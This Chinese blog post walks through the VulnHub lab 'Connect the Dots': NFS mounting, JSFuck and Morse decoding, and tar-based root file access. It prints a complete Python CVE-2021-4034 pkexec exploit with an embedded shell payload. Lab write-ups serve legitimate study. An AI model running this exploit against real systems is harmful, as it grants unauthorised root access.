vulnhub靶机connect the dots

最新推荐文章于 2024-07-26 09:40:31 发布
最新推荐文章于 2024-07-26 09:40:31 发布
阅读量95 收藏
点赞数
文章标签: 服务器 数据库 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53665747/article/details/131819075
版权

端口扫描

 NFS(NetworkFileSystem)即网络文件系统,是Linux/Unix支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。

NFS在文件传送或信息传送过程中依赖于RPC协议。RPC,远程过程调用 (Remote Procedure Call) 是能使客户端执行其他系统中程序的一种机制。NFS本身是没有提供信息传输的协议和功能的,但NFS却能让我们通过网络进行资料的分享,这是因为NFS使用了一些其它的传输协议。而这些传输协议用到这个RPC功能的。可以说NFS本身就是使用RPC的一个程序。或者说NFS也是一个RPC SERVER。所以只要用到 NFS的地方都要启动RPC服务,不论是NFS SERVER或者NFS CLIENT。这样SERVER和CLIENT才能通过RPC来实现PROGRAM PORT的对应。可以这么理解RPC和NFS的关系:NFS是一个文件系统,而RPC是负责负责信息的传输。

查看共享目录

挂载到data目录下

在.ssh下发现私钥,不过可惜还是需要密码。

剩下几个目录均没有可用信息。

web渗透

可以看到这里称呼我们为N而他是M,结合刚刚的用户Morris其实不难想到可能存在另一个用户Norris,但这里自己做的时候没有想到。

 

 MYSITE这里第一时间没注意到有个.cs文件

在register.html这个页面也是看到请求了这个.cs文件

这种类型是jsfuck,一种编码格式,这次做题才遇到。。。

把其中内容解码发现提示。

TryToGuessThisNorris@2k19 这是secret。

到这猜测可能是密码,尝试ssh链接。

连接morris失败但是Norris成功,这里结合之前的猜测和密码提示猜测可能存在Norris这个用户

第一个flag

 /usr/lib/policykit-1/polkit-agent-helper-1 可以看到有这条指令,这个存在漏洞 cve-2021-4034

#!/usr/bin/env python3

# CVE-2021-4034 in Python
#
# Joe Ammond (joe@ammond.org)
#
# This was just an experiment to see whether I could get this to work
# in Python, and to play around with ctypes

# This was completely cribbed from blasty's original C code:
# https://haxx.in/files/blasty-vs-pkexec.c

import base64
import os
import sys

from ctypes import *
from ctypes.util import find_library

# Payload, base64 encoded ELF shared object. Generate with:
#
# msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
#
# The PrependSetuid=true is important, without it you'll just get
# a shell as the user and not root.
#
# Should work with any msfvenom payload, tested with linux/x64/exec
# and linux/x64/shell_reverse_tcp

payload_b64 = b'''
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
'''
payload = base64.b64decode(payload_b64)

# Set the environment for the call to execve()
environ = [
        b'exploit',
        b'PATH=GCONV_PATH=.',
        b'LC_MESSAGES=en_US.UTF-8',
        b'XAUTHORITY=../LOL',
        None
]

# Find the C library to call execve() directly, as Python helpfully doesn't
# allow us to call execve() with no arguments.
try:
    libc = CDLL(find_library('c'))
except:
    print('[!] Unable to find the C library, wtf?')
    sys.exit()

# Create the shared library from the payload
print('[+] Creating shared library for exploit code.')
try:
    with open('payload.so', 'wb') as f:
        f.write(payload)
except:
    print('[!] Failed creating payload.so.')
    sys.exit()
os.chmod('payload.so', 0o0755)

# make the GCONV_PATH directory
try:
    os.mkdir('GCONV_PATH=.')
except FileExistsError:
    print('[-] GCONV_PATH=. directory already exists, continuing.')
except:
    print('[!] Failed making GCONV_PATH=. directory.')
    sys.exit()

# Create a temp exploit file
try:
    with open('GCONV_PATH=./exploit', 'wb') as f:
        f.write(b'')
except:
    print('[!] Failed creating exploit file')
    sys.exit()
os.chmod('GCONV_PATH=./exploit', 0o0755)

# Create directory to hold gconf-modules configuration file
try:
    os.mkdir('exploit')
except FileExistsError:
    print('[-] exploit directory already exists, continuing.')
except:
    print('[!] Failed making exploit directory.')
    sys.exit()

# Create gconf config file
try:
    with open('exploit/gconv-modules', 'wb') as f:
        f.write(b'module  UTF-8//    INTERNAL    ../payload    2\n');
except:
    print('[!] Failed to create gconf-modules config file.')
    sys.exit()

# Convert the environment to an array of char*
environ_p = (c_char_p * len(environ))()
environ_p[:] = environ

print('[+] Calling execve()')
# Call execve() with NULL arguments
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)

作者连接

提权结束。

其他方法获取flag

在Norris的目录下有ftp文件夹,里面放了几个文件,一一看过去发现game这个文件内写了莫斯码

解码

HEY#NORRIS,#YOU'VE#MADE#THIS#FAR.#FAR#FAR#FROM#HEAVEN#WANNA#SEE#HELL#NOW?#HAHA#YOU#SURELY#MISSED#ME,#DIDN'T#YOU?#OH#DAMN#MY#BATTERY#IS#ABOUT#TO#DIE#AND#I#AM#UNABLE#TO#FIND#MY#CHARGER#SO#QUICKLY#LEAVING#A#HINT#IN#HERE#BEFORE#THIS#SYSTEM#SHUTS#DOWN#AUTOMATICALLY.#I#AM#SAVING#THE#GATEWAY#TO#MY#DUNGEON#IN#A#'SECRETFILE'#WHICH#IS#PUBLICLY#ACCESSIBLE.

这里提示有一个secretfile

有一个.swp文件,这个是在使用vi等编辑器进行编辑时突然退出产生的一个缓存,对应了上述提示的电力不足。

 也是没什么信息,其中倒数第二行可能是一个密码

确定是密码。

可以执行tar

那么直接打包root目录即可

tar -czvf 1.tar.gz /root 打包

tar -xzvf 1.tar.gz 解包

经过尝试Morris权限比较低,大部分还是用Norris来做。

总结

靶机整体有点烧脑,jsfuck 和 nfs磁盘挂载没遇到过,还有学习到了可以用/sbin/getcap -r / 2>/dev/null来查看suid命令。

Eminem_zzzz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机之dawn
timesleep的博客
12-05 910
首先确定我们的IP 我们的靶机IP为192.168.34.160 kali的IP为192.168.34.175 那我们首先扫描端口 1234这个端口是我们之前做的时候留下的 我们看到了有80这个端口我们访问一下 好我们扫一下目录 我们访问一下 我们发现了日志文件我们看一下 然后我们继续看靶机的其它端口如,139,445有没有可利用的 我们看到还有一个ITDEPT的共享目录我们去看一下发...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机测试Connect-the-dots笔记
qq_56426046的博客
01-10 650
涉及到的知识点nfs 检测jsfuck 编码解密摩斯密文解密hydra 测试ssh 安全getcap 文件分析tar 打包文件山海自有归期,风雨自有相逢,意难平终将和解,万事终将如意。
vulnhub靶机 Connect-the-dots
witwitwiter的博客
09-05 707
vulnhub靶机 Connect-the-dots 靶机地址Connect The Dots: 1 ~ VulnHub 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 下载好ova之后,使用vm打开导入,务必记得将网络适配器调成与自己kali的网段一致,一般都是nat 渗透测试 使用nmap进行扫描 └─# nmap -p- -sV -T4 192.168.5.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-05
vulnhubconnect-the-dots
底层社会中的弱智
01-02 1381
万物皆有思路!思路最关键!其次就是运气了! 信息收集:使用nmap工具先找到目标IP,然后查看目标IP开放的端口-服务-版本以及目标操作系统也要知道 实施攻击:根据收集到的端口对应的服务开始攻击 让我们在局域网中先找到目标吧! 使用nmap扫描一下 nmap -Pn 你所在网段 找到目标主机了是172.16.12.14,我们来看看他开放了那一些端口? nmap -p- -sT -s...
Vulnhub靶机CONNECT THE DOTS_ 1
LainWith的博客
02-02 1031
目录介绍信息收集主机发现主机信息探测测试挂载-失败测试网站目录扫描解码jsfuckSSH登录第一个Flag信息收集新的SSH登录使用tar变相提权第二个Flag 介绍 系列:Connect The Dots(此系列仅此一台) 发布日期:2019年10月21日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: nfs 检测 jsfuck 编码解密 摩斯密文解密 getcap 文件分析 tar 打包文 靶机地址:https://www.vulnhub.
[VulnHub靶机渗透] CONNECT THE DOTS
人若无名,便可专心练剑
03-03 1143
靶机精讲之CONNECT THE DOTS ,又一台考验你的知识面的机器,至少涉及jsfuck、nfs、ftp多文件读取、getcap获取文件能力、polkit、文件图片隐写、莫尔斯码和断电隐患等知识,如果不理解这些知识点,你可能玩不转这台靶机。加油吧,少年。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
红队打靶:ConnectTheDots打靶思路详解(vulnhub
Bossfrank的博客
09-11 775
本文是vulnhub靶机connect the dots的打靶思路详解。这个靶机涉及到的知识点非常多,如果不了解的话可能无法深入探索。涵盖的知识点包括ftp渗透、nfs挂载、目录爆破、jsfuck混淆破解、文件隐写、莫尔斯电码解码、vim读取断电swp文件、getcap查看文件能力、suid提权、polkit利用与pokit权限提升漏洞利用等等。一起努力,渗透还是要实操才能进步!
Linux:基础命令学习
qq_55038440的博客
07-20 1509
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
DNS域名解析服务器
nianwan2157的博客
07-24 561
定义监听端口,如果所有地址都监听,则只写端口。反解需要注意:主机名尽量使用完整的。只允许本地主机进行查询。
如果提升服务器安全性,使用快卫士给服务器上“锁”
qq_38647109的博客
07-24 453
服务器作为数据存储与业务处理的核心,其安全性直接关系到企业的运营稳定和信息安全。面对日益复杂的网络攻击手段,如何有效提升服务器的安全防护能力,成为了每个企业和个人用户必须面对的重要课题。在众多服务器安全解决方案中,快卫士以其卓越的性能和全面的防护功能脱颖而出,成为提升服务器安全性的理想选择。
服务器数据恢复—raid信息丢失导致RAID无法被识别的数据恢复案例
beiya123的博客
07-25 365
某单位机房搬迁,将所有服务器和存储搬迁到新机房并重新连接线路,启动所有机器发现其中有一台服务器无法识别RAID,提示未做初始化操作。 发生故障的这台服务器安装LINUX操作系统,配置了NFS+FTP作为单位内部的文件服务器使用。服务器为ProLiant DL380系列服务器,通过hp smart array控制器挂载了一组由14块SCSI硬盘组成的RAID5磁盘阵列。该raid5磁盘阵列采用双循环的校验方式。 北亚企安数据恢复工程师到达现场后对故障服务器进行了初检,经过检测发现raid信息丢失。
Apollo使用(3):分布式docker部署
游王子的博客
07-24 580
Apollo 1.7.0版本开始会默认上传Docker镜像到,可以按照如下步骤获取。
数据库查询与操作指南-以Nebula图数据库为例
最新发布
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 288
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 257
用户执行,因为环境变量配置在。
vulnhub靶机系列:
09-09
4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值